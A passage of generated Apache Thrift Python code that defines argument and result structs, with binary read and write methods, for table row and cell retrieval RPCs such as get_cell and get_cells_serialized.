    return not (self == other)
class get_row_as_arrays_args:
  """
  Argument struct for the get_row_as_arrays() RPC.

  NOTE(review): the table field here is named 'name', unlike the
  'table_name' used by the sibling get_row structs -- this matches
  the thrift_spec, presumably mirroring the IDL.

  Attributes:
   - ns
   - name
   - row
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'name', None, None, ), # 2
    (3, TType.STRING, 'row', None, None, ), # 3
  )

  def __init__(self, ns=None, name=None, row=None,):
    # ns: i64 namespace handle; name/row: strings (per thrift_spec).
    self.ns = ns
    self.name = name
    self.row = row

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.row = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_row_as_arrays_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.name != None:
      oprot.writeFieldBegin('name', TType.STRING, 2)
      oprot.writeString(self.name)
      oprot.writeFieldEnd()
    if self.row != None:
      oprot.writeFieldBegin('row', TType.STRING, 3)
      oprot.writeString(self.row)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_row_as_arrays_result:
  """
  Result struct for the get_row_as_arrays() RPC: a list of
  string lists (one inner list per cell).

  Attributes:
   - success
   - e
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.LIST,(TType.STRING,None)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    # success: list of list of strings; e: ClientException on failure.
    self.success = success
    self.e = e

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Read list<list<string>>: nested readListBegin/readListEnd pairs.
          self.success = []
          (_etype98, _size95) = iprot.readListBegin()
          for _i99 in xrange(_size95):
            _elem100 = []
            (_etype104, _size101) = iprot.readListBegin()
            for _i105 in xrange(_size101):
              _elem106 = iprot.readString();
              _elem100.append(_elem106)
            iprot.readListEnd()
            self.success.append(_elem100)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_row_as_arrays_result')
    if self.success != None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.LIST, len(self.success))
      for iter107 in self.success:
        oprot.writeListBegin(TType.STRING, len(iter107))
        for iter108 in iter107:
          oprot.writeString(iter108)
        oprot.writeListEnd()
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e != None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_row_serialized_args:
  """
  Argument struct for the get_row_serialized() RPC.

  Attributes:
   - ns
   - table_name
   - row
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRING, 'row', None, None, ), # 3
  )

  def __init__(self, ns=None, table_name=None, row=None,):
    # ns: i64 namespace handle; table_name/row: strings (per thrift_spec).
    self.ns = ns
    self.table_name = table_name
    self.row = row

  def read(self, iprot):
    """Deserialize this struct from iprot; unknown fields are skipped."""
    # Fast path: C fastbinary decoder for the accelerated binary protocol.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.row = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to oprot; unset (None) fields are omitted."""
    # Fast path: C fastbinary encoder for the accelerated binary protocol.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_row_serialized_args')
    if self.ns != None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name != None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.row != None:
      oprot.writeFieldBegin('row', TType.STRING, 3)
      oprot.writeString(self.row)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # Generated structs perform no validation.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_row_serialized_result:
  """
  Thrift result struct for get_row_serialized().

  Attributes:
   - success: serialized row data (string) on success
   - e: ClientException raised by the server, if any
  """
  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_row_serialized_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_cell_args:
  """
  Thrift call-argument struct for get_cell().

  Attributes:
   - ns: namespace handle (i64)
   - table_name: table to read from
   - row: row key of the cell
   - column: column of the cell
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRING, 'row', None, None, ), # 3
    (4, TType.STRING, 'column', None, None, ), # 4
  )
  def __init__(self, ns=None, table_name=None, row=None, column=None,):
    self.ns = ns
    self.table_name = table_name
    self.row = row
    self.column = column
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.row = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.column = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_cell_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name is not None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.row is not None:
      oprot.writeFieldBegin('row', TType.STRING, 3)
      oprot.writeString(self.row)
      oprot.writeFieldEnd()
    if self.column is not None:
      oprot.writeFieldBegin('column', TType.STRING, 4)
      oprot.writeString(self.column)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_cell_result:
  """
  Thrift result struct for get_cell().

  Attributes:
   - success: the cell value (string) on success
   - e: ClientException raised by the server, if any
  """
  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_cell_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_cells_args:
  """
  Thrift call-argument struct for get_cells().

  Attributes:
   - ns: namespace handle (i64)
   - table_name: table to scan
   - scan_spec: ScanSpec describing the scan predicate
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
    (3, TType.STRUCT, 'scan_spec', (ScanSpec, ScanSpec.thrift_spec), None, ), # 3
  )
  def __init__(self, ns=None, table_name=None, scan_spec=None,):
    self.ns = ns
    self.table_name = table_name
    self.scan_spec = scan_spec
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.scan_spec = ScanSpec()
          self.scan_spec.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_cells_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name is not None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    if self.scan_spec is not None:
      oprot.writeFieldBegin('scan_spec', TType.STRUCT, 3)
      self.scan_spec.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_cells_result:
  """
  Thrift result struct for get_cells().

  Attributes:
   - success: list of Cell structs on success
   - e: ClientException raised by the server, if any
  """
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(Cell, Cell.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          # range() instead of Python-2-only xrange() — equivalent for this loop.
          (_etype, _size) = iprot.readListBegin()
          for _ in range(_size):
            _cell = Cell()
            _cell.read(iprot)
            self.success.append(_cell)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_cells_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for _cell in self.success:
        _cell.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_cells_as_arrays_args:
  """
  Thrift call-argument struct for get_cells_as_arrays().

  Attributes:
   - ns: namespace handle (i64)
   - name: table to scan
   - scan_spec: ScanSpec describing the scan predicate
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'name', None, None, ), # 2
    (3, TType.STRUCT, 'scan_spec', (ScanSpec, ScanSpec.thrift_spec), None, ), # 3
  )
  def __init__(self, ns=None, name=None, scan_spec=None,):
    self.ns = ns
    self.name = name
    self.scan_spec = scan_spec
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.name = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.scan_spec = ScanSpec()
          self.scan_spec.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_cells_as_arrays_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.name is not None:
      oprot.writeFieldBegin('name', TType.STRING, 2)
      oprot.writeString(self.name)
      oprot.writeFieldEnd()
    if self.scan_spec is not None:
      oprot.writeFieldBegin('scan_spec', TType.STRUCT, 3)
      self.scan_spec.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_cells_as_arrays_result:
  """
  Thrift result struct for get_cells_as_arrays().

  Attributes:
   - success: list of cells, each a list of strings
   - e: ClientException raised by the server, if any
  """
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.LIST,(TType.STRING,None)), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          # range() instead of Python-2-only xrange() — equivalent for these loops.
          (_etype, _size) = iprot.readListBegin()
          for _ in range(_size):
            _row = []
            (_inner_etype, _inner_size) = iprot.readListBegin()
            for _ in range(_inner_size):
              _row.append(iprot.readString())
            iprot.readListEnd()
            self.success.append(_row)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_cells_as_arrays_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.LIST, len(self.success))
      for _row in self.success:
        oprot.writeListBegin(TType.STRING, len(_row))
        for _item in _row:
          oprot.writeString(_item)
        oprot.writeListEnd()
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_cells_serialized_args:
  """
  Thrift call-argument struct for get_cells_serialized().

  Attributes:
   - ns: namespace handle (i64)
   - name: table to scan
   - scan_spec: ScanSpec describing the scan predicate
  """
  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'name', None, None, ), # 2
    (3, TType.STRUCT, 'scan_spec', (ScanSpec, ScanSpec.thrift_spec), None, ), # 3
  )
  def __init__(self, ns=None, name=None, scan_spec=None,):
    self.ns = ns
    self.name = name
    self.scan_spec = scan_spec
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.name = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.scan_spec = ScanSpec()
          self.scan_spec.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)  # unknown field id: skip for forward compatibility
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the output protocol *oprot*; None fields are omitted."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_cells_serialized_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.name is not None:
      oprot.writeFieldBegin('name', TType.STRING, 2)
      oprot.writeString(self.name)
      oprot.writeFieldEnd()
    if self.scan_spec is not None:
      oprot.writeFieldBegin('scan_spec', TType.STRUCT, 3)
      self.scan_spec.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # items() instead of Python-2-only iteritems() so repr works on Python 3 too.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class get_cells_serialized_result:
  """
  Thrift result struct for get_cells_serialized().

  Attributes:
   - success: serialized cell data (string) on success
   - e: ClientException raised by the server, if any
  """
  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e
  def read(self, iprot):
    """Populate this struct's fields from the input protocol *iprot*."""
    # Fast path: C-accelerated decoder when the protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
